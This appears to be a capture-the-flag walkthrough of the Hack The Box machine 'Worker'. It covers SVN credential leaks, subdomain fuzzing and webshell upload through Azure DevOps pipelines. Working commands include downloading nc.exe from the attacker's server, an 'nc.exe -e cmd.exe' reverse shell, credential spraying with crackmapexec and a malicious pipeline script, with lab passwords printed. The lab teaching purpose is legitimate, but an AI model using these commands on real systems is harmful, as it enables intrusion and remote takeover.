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249 lines (129 loc) · 4.36 KB

File metadata and controls

249 lines (129 loc) · 4.36 KB
nmap -p- --min-rate 10000 -Pn

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After discovering open ports, let's do greater nmap scan.

nmap -A -sC -sV -p80,3690,5985

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From port (3690), it means SVN open, let's enumerate this service.

What is SVN=> Subversion is used for maintaining current and historical versions of projects. Subversion is an open source centralized version control system. It's licensed under Apache. It's also referred to as a software version and revisioning control system. Default port: 3690.

svn checkout svn://

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svn log

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Here, we can go back to last commits, via -r option,.

svn up -r1

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Let's go to second one.

svn up -r2

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Let's read this file deploy.ps1 powershell script.

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From here, we grab sensitive credentials.

nathen: wendel98

I add this ip address into '/etc/hosts' file as 'worker.htb'

Let's do subdomain enumeration via wfuzz.

wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u -H 'Host: FUZZ.worker.htb' --hh 703

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I add all subdomains into my '/etc/hosts' file.

Let's access devops.worker.htb by entering grabbed credentials.

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I take alpha one from here, as because I can access here from website (enumeration via wfuzz command)

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Our target application is here.

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From response headers, I see that is 'X-Powered-By: ASP.NET' , that's why I need to upload malicious .aspx file.

Let's create a branch and upload our webshell, then deployment.

1.Create a branch

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2.Upload a webshell.

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3.Go to Pipelines for deployment.

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Final result is here.

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Let's add reverse shell here.

1.First, open http server to serve nc binary.

python3 -m http.server --bind 8080

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2.Then, run a below command on webshell to download nc binary.

powershell -c wget -outfile \programdata\nc.exe

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3.Then, write your reverse shell command.

\programdata\nc.exe -e cmd.exe 1337

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I got reverse shell from port (1337).

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I cannot find anything from C: disk, let's know another disks via below command.

wmic logicaldisk get deviceid, volumename, description

And I switched into 'W:' disk.

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I find sensitive usernames and passwords credentials for a file 'passwd' on 'svnrepos/www/conf' directory.

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cat creds.txt | cut -d '=' -f1 > users


cat creds.txt | cut -d '=' -f2 | sed 's/[[:space:]]*//g' > passwords

Let's do enumeration for this credentials via crackmapexec tool.

crackmapexec winrm -u users -p passwords -d 'worker.htb' --no-bruteforce

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Let's connect into machine via evil-winrm tool by using grabbed credentials.

evil-winrm -i -u robisl -p wolves11


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Also, we can join into devops.worker.htb via grabbed credentials previously. (robisl:wolves11)

Here, we have 'PartsUnlimited' repository.

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We have a privilege to create pipeline and I add malicious scripts into pipeline.

1.Pipelines -> Create a pipeline

2.Select repo.

3.Select starter pipeline

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- master

pool: 'Setup'

- script: |
    type c:\users\administrator\desktop\root.txt
  displayName: 'Pwn all the things'

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Reminder! You can also change script part with your reverse shell command

Reminder! Don't forget to approve to see results.


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